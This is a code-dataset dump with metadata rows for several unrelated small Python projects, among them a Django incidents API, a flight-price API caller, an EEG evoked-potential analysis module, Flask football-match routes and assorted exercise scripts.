blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
85d04338d64d7d444e83215d37536e20f9f2f2fb | b3b6f9edbcf7361d45b1b53853c05a281ad46a67 | /Companies Question/27 Excel Sheet Part - 1.py | d2e9b47b3e8832421527c85d6b8dc351aaa96128 | [] | no_license | nishantchauhan00/GeeksForGeeks | 7006e1fc19ca6e8f3b18c8abd3634ae9c78423ce | a0971e8e97b979f6843b433354a3e851559239dd | refs/heads/master | 2022-12-16T13:15:15.761935 | 2020-09-21T23:51:21 | 2020-09-21T23:51:21 | 297,486,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | def solver(n):
out = ""
while n > 0:
x = n % 26
if x is not 0:
out += chr(x + 64)
n = int(n/26)
else: # if x is 0:
out += 'Z'
n = int(n/26) - 1
return out[::-1]
T = int(input())
for _ in range(T):
N = int(input())
print(solver(N))
'''
https://www.geeksforgeeks.org/find-excel-column-name-given-number/
> Suppose we have a number n, let’s say 28. so corresponding to it we need to print
the column name. We need to take remainder with 26.
> If remainder with 26 comes out to be 0 (meaning 26, 52 and so on) then we put ‘Z’
in the output string and new n becomes n/26 -1 because here we are considering 26
to be ‘Z’ while in actual it’s 25th with respect to ‘A’.
Similarly if the remainder comes out to be non zero. (like 1, 2, 3 and so on) then
we need to just insert the char accordingly in the string and do n = n/26.
Finally we reverse the string and print.
'''
| [
"nishantchauhanbvcoe@gmail.com"
] | nishantchauhanbvcoe@gmail.com |
faf8c8fe8ef760c255a1876d743f8888cd3c3979 | 700b632791b4a9edb66b11de899b2d2c9ce0849c | /src/incidencias/api.py | 92883cd3f70f344b3ac00969b08aa188853d7c0b | [] | no_license | pablomt/Ejercicio-Backend-Incidencias | 4c78249a53a8d1b72be818201c59c9b8ea0bd2d0 | 4a19df90877c38005106806616cda174fba31e1c | refs/heads/master | 2021-07-08T02:07:53.181664 | 2017-10-02T15:02:50 | 2017-10-02T15:02:50 | 105,333,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,145 | py | # coding=utf-8
# Librerías extras de Django requeridas para la manipulación de la información.
from django.db.models import QuerySet
from django.views.generic.list import ListView
from django.http.response import HttpResponse
from django.db.models import Q
from django.db.models.aggregates import Sum, Count
from datetime import date, timedelta
# Este import se utilizara en la api para forzar al usuario a estar logeado para consumir las apis.
from django.contrib.auth.mixins import LoginRequiredMixin
# Imports provenientes del modelo de compromisos.
from incidencias.models import Catalogo, Area, Item, Incidencia
# Utilidades propias a utilizar dentro del API.
from sistemaIncidencias.utilities.utilities import Utilities
from incidencias.buscador import Buscador
'''
Funciones definidas fuera de una estructura de clase, para ser consumida por las clases y otras funciones
declaradas en este script.
'''
def get_array_or_none(the_string):
'''
Función que convierte un string de valores separados por coma, en una arreglo. En caso de que el string no
esté definido o esté vacío, retorna None.
:param the_string: variable a ser convertida.
:return: arreglo con los valores del string o None.
'''
if the_string is None:
return None
else:
return list(map(int, the_string.split(',')))
def get_incidencias_por_catalogo_area(incidencias_set=None, areas_array=None):
'''
Obtiene reporte para un posible dashboard general basado en las incidencias, contiene la siguiente estrucutura:
incidencias_por_catalogo_area [{id_catalogo, nombre_catalogo, tema, num_insidencias [{id_area, nombre_area,
num_area,}]}]
'''
reporte = []
catalogo_set = Catalogo.objects.filter(id=2).order_by('id')
if areas_array is None:
areas_set = Area.objects.all().order_by('id')
else:
areas_set = Area.objects.filter(Q(id__in=areas_array))
for catalogo in catalogo_set:
registro = {
"id_catalogo": catalogo.id,
"nombre_catalogo": catalogo.nombre,
"areas": [],
"num_insidencias_por_catalogo": 0
}
for area in areas_set:
if incidencias_set is None:
incidencias_filtradas = Incidencia.objects.filter(Q(item__area__catalogo__id=catalogo.id),
Q(item__area__id=area.id))
else:
incidencias_filtradas = incidencias_set.filter(Q(item__area__catalogo__id=catalogo.id),
Q(item__area__id=area.id))
incidencias_set_areas = incidencias_filtradas.values('item__area__catalogo__id',
'item__area__catalogo__nombre',
'item__area__id').annotate(
num_incidencias=Count('item__area'))
registro_area = {
"id_area": area.id,
"nombre_area": area.nombre,
"num_incidencias": 0,
}
for incidencias in incidencias_set_areas:
registro_area['num_incidencias'] = incidencias['num_incidencias']
registro["num_insidencias_por_catalogo"] = registro["num_insidencias_por_catalogo"] + incidencias[
'num_incidencias']
registro['areas'].append(registro_area)
reporte.append(registro)
print(reporte)
return reporte
'''
Definición de los endpoints tipo REST.
'''
# endpoint para devolver determinado modelo en formato JSON. La url es /incidencias/api/"modelo"
class ModelosEndpoint(LoginRequiredMixin, ListView):
def get(self, request, modelo):
return HttpResponse(Utilities.query_set_to_dumps(modelo.objects.all().order_by('nombre')),
'application/json')
# endpoint que regresa todas las areas dependiendo una categoria.
# La url es /incidencias/api/get-areas-por-catalogo?catalogo_id=1
class AreasPorCategoriaEndpoint(LoginRequiredMixin, ListView):
def get(self, request, **kwargs):
catalogo = request.GET.get('catalogo_id')
areas = Area.objects.filter(catalogo=catalogo).order_by('nombre')
respuesta = []
for area in areas:
registro = {
"area_id": str(area.id),
"area_nombre": area.nombre,
"catalogo_id": str(area.catalogo.id),
"catalogo_nombre": area.catalogo.nombre,
}
respuesta.append(registro)
print(respuesta)
return HttpResponse(Utilities.json_to_dumps(respuesta), 'application/json')
# Endpoint que regresa todos los items dependiente una area.
# URL incidencias/api/get-items-por-area?area_id=1
class ItemsPorAreaEndpoint(LoginRequiredMixin, ListView):
def get(self, request, **kwargs):
area = request.GET.get('area_id')
items = Item.objects.filter(area__id=area)
return HttpResponse(Utilities.query_set_to_dumps(items), 'application/json')
class BuscadorIncidencias(LoginRequiredMixin, ListView):
def get(self, request, **kwargs):
response = {}
buscador = Buscador(
catalogos=get_array_or_none(request.GET.get('catalogos')),
areas=get_array_or_none(request.GET.get('areas')),
items=get_array_or_none(request.GET.get('items')),
# Parámetros con comportamiento de rangos.
rango_de_fecha_creacion_desde=request.GET.get('rango_de_fecha_creacion_desde'),
rango_de_fecha_creacion_hasta=request.GET.get('rango_de_fecha_creacion_hasta'),
)
incidencias = buscador.buscar()
# Reporte 1: obtener incidencias por area
# Obtiene las incidencias agrupados por catalogo y por areas.
response["indicencias_por_area"] = get_incidencias_por_catalogo_area(incidencias, get_array_or_none(
request.GET.get('areas')))
return HttpResponse(Utilities.json_to_dumps(response), 'application/json; charset=utf-8')
| [
"pmoretepi@gmail.com"
] | pmoretepi@gmail.com |
f9bd3ed65fdfbde836edc6b63ca43bbde1280abe | 0ec65a65935e877dec4fe97ff9b9422eee1b0d74 | /更新excel数据_泡菜数据腌制.spec | 17e73a00b9af586783bf0e00a5d973ceab2b4999 | [] | no_license | kuifye/-python- | 48f438a9a5bac340175212810e2e8a7c89b6e5ec | 26c2d2793901c611c498fe475d0e7af67e71de46 | refs/heads/master | 2022-11-02T21:45:19.345657 | 2022-10-18T12:30:00 | 2022-10-18T12:30:00 | 266,112,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 971 | spec | # -*- mode: python ; coding: utf-8 -*-
block_cipher = None
a = Analysis(['更新excel数据_泡菜数据腌制.py'],
pathex=['D:\\资料\\程序\\python\\heathstone\\hearthstone'],
binaries=[],
datas=[],
hiddenimports=[],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
a.binaries,
a.zipfiles,
a.datas,
[],
name='更新excel数据_泡菜数据腌制',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
upx_exclude=[],
runtime_tmpdir=None,
console=True )
| [
"noreply@github.com"
] | noreply@github.com |
1c93b3cc18e5fdea86e84540ef2d5a8c8add5445 | 2307605c5c23581069b0ac919924adc16dba3bd2 | /mathCalc/printN_fibanocci_Number.py | 3fc5f383a390ea3d55baf49d973d7a14e3ea237e | [] | no_license | kshitijyadav1/Python_Programming_Stuff | c2bf0c81e09065452c8a7af658303c0abe751563 | 15b476a498e1a1cb3fb4dfa9c651d053a0f2a90f | refs/heads/master | 2020-08-04T08:36:35.409140 | 2019-10-21T03:28:02 | 2019-10-21T03:28:02 | 212,075,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | #! python3
# find fibanocci number from the series init and to where the series end.
import sys
from_ = 0
to_ = 0
try:
to_ = sys.argv[2]
except:
to_ = int(input("Enter the fibanocci series range: "))
def n_Fibanocci_series(end):
numberA = 0
numberB = 1
fib = 0
for val in range(end):
if val == 0:
fib = numberA
print((val + 1), " fibonacci number ",fib)
elif val == 1:
fib = numberB
print((val + 1), " fibonacci number ",fib)
elif val > 1:
fib = numberA + numberB
numberA = numberB
numberB = fib
print((val + 1), " fibonacci number ",fib)
print("="*31)
n_Fibanocci_series(to_)
| [
"kshitijyadav147258@gmail.com"
] | kshitijyadav147258@gmail.com |
9ad82cda5743375f3dcf03cb7bb97819ab9ff685 | 0e4fe0e4ac4cc49e60b1aee752f7aabf17f905f0 | /producer/api_caller.py | d9224e9a88dff9f74581362f3679a843c8bcb186 | [
"MIT"
] | permissive | igorgorbenko/aviasales_kinesis | 2c77afa0a47d6a580a00a571d0ab88c45a502036 | 46c099e0f8a96e85244954a6dca1aab81405b91f | refs/heads/master | 2021-03-23T03:46:55.265449 | 2020-04-27T07:40:01 | 2020-04-27T07:40:01 | 247,420,021 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,718 | py | #!/usr/bin/python3
"""Example Code of API calling to receive the prices of the tickets."""
import sys
import time
import logging
import csv
import asyncio
from aiohttp import ClientSession, FormData
from urllib.error import HTTPError
import json
import uuid
TARGET_FILE = time.strftime(r'/var/log/airline_tickets/%Y%m%d-%H%M%S.log')
BASE_URL = 'http://api.travelpayouts.com/v2/prices/month-matrix'
CURRENCY = 'rub'
ORIGIN = 'LED'
DESTINATION = 'KZN'
SHOW_TO_AFFILIATES = 'false'
TRIP_DURATION = '1'
LOGGER = logging.getLogger('StatsCreator')
if not LOGGER.handlers:
LOGGER.setLevel(logging.INFO)
FORMATTER = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s',
'%Y-%m-%d %H:%M:%S')
CONSOLE_HANDLER = logging.StreamHandler(sys.stdout)
CONSOLE_HANDLER.setFormatter(FORMATTER)
LOGGER.addHandler(CONSOLE_HANDLER)
class TicketsApi:
"""Api caller class."""
def __init__(self, headers):
"""Init method."""
self.base_url = BASE_URL
self.headers = headers
async def get_data(self, data):
"""Get the data from API query."""
response_json = {}
async with ClientSession(headers=self.headers) as session:
try:
response = await session.get(self.base_url, data=data)
response.raise_for_status()
LOGGER.info('Response status %s: %s',
self.base_url, response.status)
response_json = await response.json()
except HTTPError as http_err:
LOGGER.error('Oops! HTTP error occurred: %s', str(http_err))
except Exception as err:
LOGGER.error('Oops! An error ocurred: %s', str(err))
return response_json
def get_guid():
"""Return the random UID."""
return str(uuid.uuid4())
def log_maker(response_json):
"""Save the response into a csv file."""
with open(TARGET_FILE, 'w+') as csv_file:
csv_writer = csv.writer(csv_file)
count = 0
new_row = []
for resp in response_json['data']:
new_row = list(resp.values())
new_row.append(get_guid())
csv_writer.writerow(new_row)
count += 1
return count
def prepare_request(api_token):
"""Return the headers and query fot the API request."""
headers = {'X-Access-Token': api_token,
'Accept-Encoding': 'gzip'}
data = FormData()
data.add_field('currency', CURRENCY)
data.add_field('origin', ORIGIN)
data.add_field('destination', DESTINATION)
data.add_field('show_to_affiliates', SHOW_TO_AFFILIATES)
data.add_field('trip_duration', TRIP_DURATION)
return headers, data
async def main():
"""Get run the code."""
if len(sys.argv) != 2:
print('Usage: api_caller.py <your_api_token>')
sys.exit(1)
return
api_token = sys.argv[1]
headers, data = prepare_request(api_token)
api = TicketsApi(headers)
response = await api.get_data(data)
# print(json.dumps(response, indent=4))
if response.get('success', None):
LOGGER.info('API has returned %s items', len(response['data']))
try:
count_rows = log_maker(response)
LOGGER.info('%s rows have been saved into %s',
count_rows,
TARGET_FILE)
except Exception as e:
LOGGER.error('Oops! Request result was not saved to file. %s',
str(e))
else:
LOGGER.error('Oops! API request was unsuccessful %s!', response)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| [
"igor_gorbenko@list.ru"
] | igor_gorbenko@list.ru |
1583d364dfcf8b3a6940cd3fdd51c257ddb2337f | 6ab2fc04b77315072d202d31fa39357c2a8dbffd | /neuralpanda/analyser/aEvokedPotential.py | 6903c1327b9475dad38b3de3ae2b2cd0b3dfe36c | [] | no_license | kupo9/neuralpanda | b1e84dba826dbc8895ff7389a9af1e5ffa8820fd | 8814703925016e3c10d1ebed65763eb02ff4950b | refs/heads/master | 2020-03-26T16:38:06.094784 | 2018-08-17T11:51:16 | 2018-08-17T11:51:16 | 145,112,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,387 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 14:19:31 2015
@author: Pomesh
EvokedPotential methods for analysis. For now, the matplotlib code is here.
It'll need to be moved later.
Adding write to excel and txt file, use self.currPlot to get the index to the
current plot. Rename this in the code, A1, C1 are max, min labels
Write to A2, C2
"""
from __future__ import division
import itertools
import numpy as np
from scipy import signal
#from .. import pEvokedPotential as pe
from scipy.signal import butter, filtfilt, lfilter, argrelextrema
from scipy.fftpack import fft
import matplotlib.pyplot as plt
import peakdetect as peakdect
import xlwings as xw
class aEvokedPotential():
def __init__(self, figure, segment, _type, *pEvokedPotential):
#self.evp = pEvokedPotential
self.fig = figure
if _type == "ep":
self.infFile = open("empty_statsFile_ep" + str(segment+1) + ".txt", 'w')
if _type == "fp":
self.infFile = open("empty_statsFile_fp" + str(segment+1) + ".txt", 'w')
for i in pEvokedPotential:
# figure.axes[pEvokedPotential.index(i)].get_xaxis().set_visible(False)
# figure.axes[pEvokedPotential.index(i)].get_yaxis().set_visible(False)
if _type == "ep":
self.evp = i
print("\nNew Axes: " + str(self.evp.name))
#plt.figure()
figure.axes[pEvokedPotential.index(i)].set_xticklabels([])
figure.axes[pEvokedPotential.index(i)].set_yticklabels([])
self.currPlot = pEvokedPotential.index(i)
xw.Sheet.add()
xw.Sheet(self.currPlot+1).activate()
xw.Sheet(self.currPlot+1).name = str(self.evp.name)
xw.Range('A1').value = 'Maxima'
xw.Range('D1').value = 'Minima'
self._draw()
i.close()
if _type == "fp":
self.evp = i
print("FP")
figure.axes[pEvokedPotential.index(i)].set_xticklabels([])
figure.axes[pEvokedPotential.index(i)].set_yticklabels([])
self.currPlot = pEvokedPotential.index(i)
xw.Sheet.add()
xw.Sheet(self.currPlot+1).activate()
xw.Sheet(self.currPlot+1).name = str(self.evp.name)
xw.Range('A1').value = 'Maxima'
xw.Range('D1').value = 'Minima'
self.drawDiffMeasures()
i.close()
if _type == "ep":
self.infFile.close()
if _type == "fp":
self.infFile.close()
def drawDiffMeasures(self):
print("Drawing DiffMeasures")
#self.fig.axes[0].legend(loc="upper right", fontsize=12)
d = self.evp._getDiff()
print "dshape" + str(d.shape)
stdBase = np.std(d[2000:4870])
data =signal.filtfilt(np.ones(3)/3, 1, np.divide(d, stdBase))
maxv, minv = peakdect.peakdet(data[4850:], delta=3)
print "data shape" + str(data.shape)
maxv = maxv[1:]
self.infFile.write("\n+++\n")
self.infFile.write(self.evp.name)
self.maxList = []
self.minList = []
print "maxv" + str(maxv)
print "minv" + str(minv)
try:
self.fig.axes[self.currPlot].plot(maxv[:,0]+4870, maxv[:,1], 'o', color = 'red')
self.fig.axes[self.currPlot].plot(minv[:,0]+4870, minv[:,1], 'x', color = 'green')
self.writeToStatsFile(maxv, minv)
except (IndexError) as e:
print "----Empty"
self.maxList = np.asarray(self.maxList)
print self.maxList
_curr = 2
try:
for i in range(0, len(self.maxList)):
#print "Curr: " + str(_curr)
_size = self.maxList[i].size
#print self.maxList[i][:,0]
self.maxList[i][:,0] = np.multiply(self.maxList[i][:,0], (1/16))
print self.maxList[i]
xw.Range('A'+str(_curr)).value = self.maxList[i]
xw.Range('A'+str(_curr)).color = (255,50,78)
_curr +=_size
except (ValueError, IndexError) as e:
print "Something Went Wrong, Dont ask me what"
_curr = 2
try:
for i in range(0, len(self.minList)):
#print "Curr: " + str(_curr)
_size = self.minList[i].size
#print self.minList[i]
self.minList[i][:,0] = np.multiply(self.minList[i][:,0], (1/16))
xw.Range('D'+str(_curr)).value = self.minList[i]
xw.Range('D'+str(_curr)).color = (102,205,170)
_curr +=_size
except (ValueError, IndexError) as e:
print "Something Went Wrong "
# try:
# self.infFile.write("\nMaxList\n")
# _j = np.nanmean(self.maxList, axis= 0)
# _j[:,0] = (_j[:,0] + 4700)*(1/16)
# self.infFile.write(str(_j))
#
# self.infFile.write("\nMinList\n")
# _g = np.nanmean(self.minList, axis= 0)
# _g[:,0] = (_g[:,0] + 4700)*(1/16)
# self.infFile.write(str(_g))
#
# except (ValueError, IndexError) as e:
# print "Value Error on: " + str(self.evp.name)
#
# #self.fig.axes[0].set_ylim([0, 5])
print ("Plot Diff\n")
#self.drawAll()
self.fig.axes[self.currPlot].set_title(self.evp.name, loc="left", fontsize=12)
self.fig.axes[self.currPlot].set_ylim([-10, 280])
#self.fig.axes[self.currPlot].set_ylabel('FP', fontsize=5)
self.fig.axes[self.currPlot].plot(data, label = self.evp.name, linewidth=1.0)
del d, data
def _draw(self):
#writing name to statsfile
self.infFile.write("\n\n++++++++++++++++++++++++++++++\n")
self.infFile.write(self.evp.name)
self.maxList = []
self.minList = []
self.drawAll()
print len(self.maxList)
_curr = 2
try:
for i in range(0, len(self.maxList)):
#print "Curr: " + str(_curr)
_size = self.maxList[i].size
#print self.maxList[i][:,0]
self.maxList[i][:,0] = np.multiply(self.maxList[i][:,0], (1/16))
print self.maxList[i]
xw.Range('A'+str(_curr)).value = self.maxList[i]
xw.Range('A'+str(_curr)).color = (255,50,78)
_curr +=_size
except IndexError as e:
print "Something Went Wrong "
_curr = 2
try:
for i in range(0, len(self.minList)):
#print "Curr: " + str(_curr)
_size = self.minList[i].size
#print self.minList[i]
self.minList[i][:,0] = np.multiply(self.minList[i][:,0], (1/16))
xw.Range('D'+str(_curr)).value = self.minList[i]
xw.Range('D'+str(_curr)).color = (102,205,170)
_curr +=_size
except IndexError as e:
print "Something Went Wrong "
self.maxList = np.asarray(self.maxList)
self.minList = np.asarray(self.minList)
try:
self.infFile.write("\nMaxList\n")
_j = np.nanmean(self.maxList, axis= 0)
_j[:,0] = (_j[:,0] + 5000)*(1/16)
self.infFile.write(str(_j))
self.infFile.write("\nMinList\n")
_g = np.nanmean(self.minList, axis= 0)
_g[:,0] = (_g[:,0] + 5000)*(1/16)
self.infFile.write(str(_g))
except (ValueError, IndexError) as e:
print "Value Error on: " + str(self.evp.name)
#
# plt.title("EP: " + self.evp.info + " Segment: " + str(self.evp._seg + 1) + "MCS_" + str(self.evp._mainStimChannel))
# plt.legend(loc= "upper right")
# plt.ylim([-5000, 5000])
_val = plt.xticks()
plt.xscale
#plt.savefig("images/" +self.evp.info + "MCS_" + str(self.evp._mainStimChannel) + "_segment_" + str(self.evp._seg + 1) + ".png")
def _plotEvokedPotential(self, a):
#ask about these
data = np.mean(self.evp.getCSC_e(a), axis = 0)
d =signal.filtfilt(np.ones(50)/50, 1, data)
#print "dshape" + str(d.shape)
#_test = signal.filtfilt(np.ones(50)/50, 1, data[5000:])
maxv, minv = peakdect.peakdet(d[2650:], delta=250)
maxv = maxv[1:]
#minv = minv[1:]
try:
#self.fig.axes[self.currPlot].plot(maxv[:,0]+2700, maxv[:,1], 'o', color = 'red')
self.fig.axes[self.currPlot].plot(minv[:,0]+2700, minv[:,1], 'o', color = 'green')
self.writeToStatsFile(maxv, minv)
except (IndexError) as e:
print "----Empty"
# for i in range(0, len(_alt)):
# plt.plot(_alt[i] + 5000, _test[_alt][i], 'o', color = 'red')
#
print("Plotting EPs")
twix = self.fig.axes[self.currPlot]
twix.set_ylim([-3000, 5000])
twix.set_yticklabels([])
twix.set_title(self.evp.name, loc="left", fontsize=12)
twix.plot(d, label = "Channel : " + str(a), linewidth=0.4)
# for i in range(0, len(maxi[0])):
# self.fig.axes[self.currPlot].plot(maxi[0][i]+5000, d[5000:7000][maxi][i], 'o', color='gray')
#
# for i in range(0, len(mini[0])):
# self.fig.axes[self.currPlot].plot(mini[0][i]+5000, d[5000:7000][mini][i], 'x', color = 'red')
del d, data
def drawAll(self):
self.f = list(itertools.combinations(self.evp._cscArray,2))
g = self.f[ :len(self.evp._cscArray)-1]
#self.evp.getSubSignals(g)
for i in self.evp._cscArray:
self._plotEvokedPotential(i)
def writeToStatsFile(self, maxv, minv):
#maxAvg = np.average(maxv, axis=0)
#minAvg = np.average(minv, axis=0)
self.infFile.write("\n")
self.infFile.write("\nmax values")
self.infFile.write(str(maxv))
self.infFile.write("\nmin values")
self.infFile.write(str(minv))
#self.infFile.write("\nMax Avg: " + str(maxAvg))
#self.infFile.write("\nMin Avg: " + str(minAvg))
self.infFile.write("\n")
self.maxList.append(maxv)
self.minList.append(minv)
def butter_bandpass(self, lowcut, highcut, fs, order=2):
nyq = 0.5 * fs
low = lowcut / nyq
high = highcut / nyq
b, a = butter(order, [low, high], btype='stop')
return b, a
# def _drawAll(self):
# #what to index here?
# [self._calcAndDraw(x) for x in self.evp.getAll()]
""" Old file, for checking purposes"""
## -*- coding: utf-8 -*-
#"""
#Created on Tue Nov 17 14:19:31 2015
#
#@author: Pomesh
#
#EvokedPotential methods for analysis. For now, the matplotlib code is here.
#It'll need to be moved later.
#
#TODO: Refactor to separate class for handling the drawing.
#This class should only be for analysis. Should return an array of µv values
#that are plotted with pandaplot.
#
#"""
#from __future__ import division
#
#import itertools
#import numpy as np
##from .. import pEvokedPotential as pe
#
#import matplotlib.pyplot as plt
#from matplotlib.ticker import FormatStrFormatter
#from scipy import signal
#
#class aEvokedPotential():
#
# def __init__(self, *pEvokedPotential):
# #self.evp = pEvokedPotential
# fig = plt.figure()
#
# for i in pEvokedPotential:
# self.evp = i
# self._draw()
# plt.close()
#
# def createSubplots(self, i ):
# pass
#
# def _draw(self):
# self._drawAll()
## plt.title("EP: " + self.evp.info + " Segment: " + str(self.evp._seg + 1) +
## "MCS_" + str(self.evp._mainStimChannel))
# plt.legend(loc= "lower right")
# ax = plt.axes()
# tks=ax.get_xticks()
# ax.set_xticklabels(np.round(np.multiply(tks,(1/1017))-0.3, 1))
# #ax.xaxis.set_major_formatter(FormatStrFormatter('%0.2f'))
# plt.ylim([-1000, 1000])
# plt.savefig("images/" +self.evp.info + "MCS_" + str(self.evp._mainStimChannel) +
# "_segment_" + str(self.evp._seg + 1) + ".png", dpi = 300)
# #print np.multiply(tks, (1/1017))
# del tks, ax
#
# def _drawAll(self):
# f = list(itertools.combinations(self.evp._cscArray,2))
# g = f[ :len(self.evp._cscArray)-1]
# #self.evp.getSubSignals(g)
# for i in self.evp._cscArray:
# self._calcAndDraw(i)
#
# def _calcAndDraw(self, a):
# #ask about these
# self.calulatedEp = self.evp.getEvokedPotential(a, 3)
## print "length ep: " + str(n+1) + str(len(self.calulatedEp)) +"\n"
# plt.plot(self.calulatedEp, label = "Channel : " + str(a), linewidth=0.3)
# return self.calulatedEp | [
"kupo9.tmp@gmail.com"
] | kupo9.tmp@gmail.com |
b4199952fdd0dccb29de5104b84e01be8057babf | d7aaacce581943b22c36943e6e487a5641bf4f03 | /src/friendlypins/thumbnail.py | 14898ef0301c6c1b400e6aadcecda0643ed514ed | [
"Apache-2.0"
] | permissive | TheFriendlyCoder/friendlypins | a8bac31f941fbb96dd5422d873acece59e6944ae | 5f7f4a70c1681f1177a14d4aa7669797e2f5bdcd | refs/heads/master | 2021-11-08T00:28:23.054020 | 2021-03-07T00:32:05 | 2021-03-07T00:32:05 | 127,459,545 | 5 | 0 | Apache-2.0 | 2021-10-21T18:43:19 | 2018-03-30T18:19:37 | Python | UTF-8 | Python | false | false | 1,121 | py | """Primitives for operating on Pinterest pins"""
import logging
import json
class Thumbnail(object):
"""Abstraction around a Pin's thumbnail"""
def __init__(self, data):
"""
Args:
data (dict): Raw Pinterest API data describing a thumbnail
"""
self._log = logging.getLogger(__name__)
self._data = data
def __str__(self):
return json.dumps(dict(self._data), sort_keys=True, indent=4)
def __repr__(self):
return "<{0} ({1}x{2})>".format(
self.__class__.__name__,
self.width,
self.height)
@property
def width(self):
"""int: The width of the thumbnail image, in pixels"""
return int(self._data['original']['width'])
@property
def height(self):
"""int: The height of the thumbnail image, in pixels"""
return int(self._data['original']['height'])
@property
def url(self):
"""str: Source URL where the thumbnail image can be found"""
return self._data['original']['url']
if __name__ == "__main__": # pragma: no cover
pass
| [
"thefriendlycoder@gmail.com"
] | thefriendlycoder@gmail.com |
096aa9fd40cf41cf3019872c32497b5338e2fef0 | f696cf7d4eacb113b399c26796a254aa9e4e8635 | /services/suspicious/scripts/wsgi.py | ea891341d41bb52c3898ed4f3b81327fcd40d28d | [] | no_license | VladyslavKurmaz/spot-monitor | 6eb10533c5ff7dcb3811d0bd9ee4387e87a3f8e6 | 2c49f7fc9dda780715102538edc4094daac68c36 | refs/heads/master | 2021-04-30T05:19:31.711215 | 2018-04-02T14:20:06 | 2018-04-02T14:20:06 | 121,412,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | from logging.config import fileConfig
fileConfig("./logging.conf")
from app import app
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8001, threaded=True) | [
"oleksandr.popovych@globallogic.com"
] | oleksandr.popovych@globallogic.com |
c9ceee3b6bd55136e70ee6e21bb059a28b3d963b | 27305b08ae1378fd9b84b6f48a79e5896fc38e9b | /jogos/routes.py | b57c2c18d563239686ff9b5518fd453f60f97d71 | [] | no_license | carloshdurante/tabela_brasileirao | 404d3d112236db078d49a73b411c0a26de181863 | 318497ba9ea8195a64ede95d6727289eb7f519a4 | refs/heads/master | 2023-05-10T09:58:52.146492 | 2021-06-07T07:43:31 | 2021-06-07T07:43:31 | 374,576,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,714 | py | from flask import render_template, redirect, url_for, flash, request
from flask_login import login_required
from jogos import bp
from jogos.forms import NovoJogoForm
from models import Jogo, Time
from brasileirao import db
from sqlalchemy.exc import IntegrityError
@bp.route('/')
@login_required
def index():
jogos = Jogo.jogos_rodada()
return render_template('listarjogos.html', title='Jogos', jogos=jogos)
@bp.route('/new', methods=['GET', 'POST'])
@login_required
def create():
form = NovoJogoForm()
times = list(Time.query.with_entities(Time.id, Time.nome))
form.mandante.choices = times
form.visitante.choices = times
if form.validate_on_submit():
jogo = Jogo(rodada=form.rodada.data, data=form.data.data,
time_mandante_id=form.mandante.data,
gols_mandante=form.gols_mandante.data,
amarelos_mandante=form.amarelos_mandante.data,
vermelhos_mandante=form.vermelhos_mandante.data,
time_visitante_id=form.visitante.data,
gols_visitante=form.gols_visitante.data,
amarelos_visitante=form.amarelos_visitante.data,
vermelhos_visitante=form.vermelhos_visitante.data)
try:
db.session.add(jogo)
db.session.commit()
except IntegrityError:
db.session.rollback()
e = {'Duplicidade': ["Esta partida já ocorrreu"]}
return render_template('novojogo.html', title='Novo Jogo',
form=form, jogo=None, errors=e)
else:
return redirect(url_for('jogos.index'))
return render_template('novojogo.html', title='Novo Jogo', form=form,
jogo=None, errors=form.errors)
@bp.route('/<int:id>/edit', methods=['GET', 'POST'])
@login_required
def update(id):
jogo = Jogo.query.get_or_404(id)
form = NovoJogoForm()
times = list(Time.query.with_entities(Time.id, Time.nome))
form.mandante.choices = times
form.visitante.choices = times
if form.validate_on_submit():
jogo.rodada = form.rodada.data
jogo.data = form.data.data
jogo.time_mandante_id = form.mandante.data
jogo.gols_mandante = form.gols_mandante.data
jogo.amarelos_mandante = form.amarelos_mandante.data
jogo.vermelhos_mandante = form.vermelhos_mandante.data
jogo.time_visitante_id = form.visitante.data
jogo.gols_visitante = form.gols_visitante.data
jogo.amarelos_visitante = form.amarelos_visitante.data
jogo.vermelhos_visitante = form.vermelhos_visitante.data
db.session.add(jogo)
db.session.commit()
flash('Your changes have been saved.')
return redirect(url_for('jogos.index'))
elif request.method == 'GET':
form.rodada.data = jogo.rodada
form.data.data = jogo.data
form.mandante.data = jogo.time_mandante_id
form.gols_mandante.data = jogo.gols_mandante
form.amarelos_mandante.data = jogo.amarelos_mandante
form.vermelhos_mandante.data = jogo.vermelhos_mandante
form.visitante.data = jogo.time_visitante_id
form.gols_visitante.data = jogo.gols_visitante
form.amarelos_visitante.data = jogo.amarelos_visitante
form.vermelhos_visitante.data = jogo.vermelhos_visitante
return render_template('novojogo.html', form=form, title="Editar Jogo",
jogo=jogo, errors=form.errors)
@bp.route('/<int:id>/delete')
@login_required
def delete(id):
jogo = Jogo.query.get_or_404(id)
db.session.delete(jogo)
db.session.commit()
return redirect(url_for('jogos.index'))
| [
"carlos.durante@outlook.com"
